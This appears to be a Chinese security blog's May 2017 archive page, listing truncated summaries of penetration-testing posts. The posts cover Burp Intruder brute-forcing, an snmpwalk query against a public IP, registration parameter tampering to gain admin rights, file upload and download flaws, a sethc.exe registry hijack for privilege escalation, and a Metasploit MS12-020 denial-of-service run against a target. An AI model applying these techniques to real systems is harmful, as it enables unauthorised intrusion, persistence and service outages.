05 2017 档案

摘要:1.设置Burp代理 然后将数据包发送到Intruder 并将Password和Token的值定义了目标 Attact type设置为 Pitchfork 2.修改Number of threats的值: 3.下拉,并找到Grep--Extrace 点击Add 4.进入之后点击Fetch respo 阅读全文
posted @ 2017-05-23 18:41 小生观察室
摘要:root@bt:~# snmpwalk -c private -v 1 220.174.246.93 1.3.6.1.4.1.2011.5.2.1.10.1 SNMPv2-SMI::enterprises.2011.5.2.1.10.1.1.6.97.110.113.117.97.110 = STR 阅读全文
posted @ 2017-05-18 14:42 小生观察室
摘要:通过/member/reg.asp 注册普通用户时修改post参数可提升为管理员打开burp进行抓包修改,默认的参数是&Gander=1 修改为Gander=1,1,1,1,1,1,1,1) 选中按ctrl+shift+u进行编码截断,此原理是在注 册用户的时候没有判断性别参数 Gender 是否为 阅读全文
posted @ 2017-05-09 19:17 小生观察室
摘要:/editor/uploadAction.action1. epstar/servlet/RaqFileServer?action=save&fileName=/../test.jsp 火狐 post内容 hello word 任意下载: DownLoadServlet?fileName=&file 阅读全文
posted @ 2017-05-09 19:11 小生观察室
摘要:发现存在注入漏洞 asp的站 穿山甲可以注入,但是发现是mysql的 还卡的有点慢上代理, 发现是root权限, url大小写访问 没变化,确定是windows服务器,可以写,自己在C盘写了个txt 在读一下 发现可以读但是不知道 网站 的物理路径 百度谷歌 也不知道怎么谷歌法 又不能 phpinf 阅读全文
posted @ 2017-05-08 17:35 小生观察室
摘要:执行reg文件实现shift提权"regedit /s c:\11.reg" 11.reg内容: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.e 阅读全文
posted @ 2017-05-08 17:02 小生观察室
摘要:原因一:端口改了原因二:内网原因三:防火墙原因四:tcp/ip限制原因五:不属于远程登陆组原因六:waf防护(安全狗之类的)端口改了,可以webshell读取终端端口,要是能执行命令,就 先 tasklist /svc 查找那个终端服务的 pid 之后再 netstat -ano 或直接 netst 阅读全文
posted @ 2017-05-08 09:12 小生观察室
摘要:使用MSF:use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 利用此漏洞我测试目标的远程端口为33890,如图: 当出现 seems down就说明目标已经被攻击。如图已经蓝屏。 阅读全文
posted @ 2017-05-05 14:22 小生观察室
该文被密码保护。
posted @ 2017-05-04 10:25 小生观察室